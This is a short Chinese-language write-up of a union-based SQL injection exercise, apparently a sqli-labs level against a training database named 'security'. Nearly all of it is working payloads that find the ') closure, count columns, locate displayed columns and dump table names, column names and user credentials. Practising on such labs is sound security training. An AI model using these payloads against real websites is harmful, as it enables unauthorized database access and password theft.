1、判断什么类型注入

?id=1 正常显示

?id=1' （报错：''1'') LIMIT 0,1'）

?id=1'' 正常显示

?id=1'#(报错：''1'') LIMIT 0,1')

可知闭合方式为')

2、查看列数

?id=1') order by 3 --+ (没有报错)

?id=1') order by 4 --+ (报错)

说明有3列

 3、使用联合查询查看回显位置(前面为错可以执行后面的)

?id=-1') union select 1,2,3 --+

回显在2，3，列

4、查询数据库名(security)

?id=-1') union select 1,database(),3 --+

5、查询表名(一共爆出四张表，查看敏感表users)

?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();--+

6、查询users表中字段名(查看到了敏感字段id,username,password)

 ?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users';--+

7、查看字段username和password的信息

  ?id=-1') union select 1,database(),group_concat(username,password) from security.users;--+

为了方便分清楚username和密码，可以用id将信息隔开

   ?id=-1') union select 1,database(),group_concat(username,id,password) from security.users;--+